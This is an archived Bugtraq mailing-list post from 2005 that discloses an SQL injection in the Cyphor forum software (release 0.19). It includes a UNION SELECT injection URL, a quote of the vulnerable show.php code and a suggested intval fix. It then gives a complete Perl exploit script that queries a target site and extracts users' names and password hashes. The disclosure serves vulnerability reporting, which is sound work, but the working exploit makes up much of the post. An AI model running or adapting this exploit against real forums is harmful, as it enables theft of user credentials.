Cyphor (Release: 0.19) Sql injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Cyphor (Release: 0.19) Sql injection
From: s2b@xxxxxxxxxxx
Date: 13 Nov 2005 19:21:27 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hello

This is sql injection in cyphor

Discovered by : HACKERS PAL

Greets For Devil-00 - Abducter - Almaster
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injected vresions :-
Cyphor  (Release: 0.19) and all Versions Up To now
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injected File
show.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injection code :-
show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,password,null,null,null%20from%20users%20where%20id=1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Discovering the vul :-
searching in show.php file in line 59 to 62 as below

[/code]
    if ($id) {
        // a message with id=$id will be displayed
        $message_mode = 1;
        $query = "SELECT * FROM $db_table_name WHERE id=$id";
[/code]

The Programmed Didont Check The $id Variable .. if it was integer
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
How to protect :-

after 
        $message_mode = 1;

add
        // Script Protection By : HACKERS PAL
$id=intval($id);
if(!$id)
{
        die("<br>We Dont allow Skript Kidz .. <br> By <a 
hre='Http://www.sqor.net'>HACKERS PAL</a>");
}
        // !/script Porotection By : HACKERS PAL fINISHED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
exploit :-

#!/bin/env perl

#//-----------------------------------------------------------#

#//        Cyphor Forum SQL Injection Exploit .. By HACKERS PAL

#//                   Greets For Devil-00 - Abducter - Almaster

#//                          http://WwW.SoQoR.NeT

#//-----------------------------------------------------------#



use LWP::Simple;



print "\n#####################################################";

print "\n#      Cyphor Forum Exploit By : HACKERS PAL        #";

print "\n#               Http://WwW.SoQoR.NeT                #";



if(!$ARGV[0]||!$ARGV[1]) {

print "\n# -- Usage:                                         #";

print "\n# -- perl $0 [Full-Path] 1                      #";

print "\n# -- Example:                                       #";

print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";

print "\n#     Greets To Devil-00 - Abducter - almastar      #";

print "\n#####################################################\n";

    exit(0);

}

else

{

print "\n#     Greets To Devil-00 - Abducter - almastar      #";

print "\n#####################################################\n";



        $web=$ARGV[0];
        $id=$ARGV[1];

$url = 
"show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,10%20from%20users%20where%20id=$id";

            $site="$web/$url";

$page = get($site) || die "[-] Unable to retrieve: $!";

print "\n[+] Connected to: $ARGV[0]\n";



print "[+] User ID is : $id ";

$page =~ m/<span class=bigh>(.*?)<\/span>/ && print "\n[+] User Name is: $1\n";

print "\n[-] Unable to retrieve User Name\n" if(!$1);

$page =~ m/<span class=message>(.*?)<\/span>/ && print "[+] Hash of password 
is: $1\n";

print "[-] Unable to retrieve hash of password\n" if(!$1);



}



print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are 
Welcome\n\n";

#finished

Prev by Date: Malware Removal and Prevention Procedure
Next by Date: Midicart sql injection
Previous by thread: Malware Removal and Prevention Procedure
Next by thread: Midicart sql injection
Index(es):
- Date
- Thread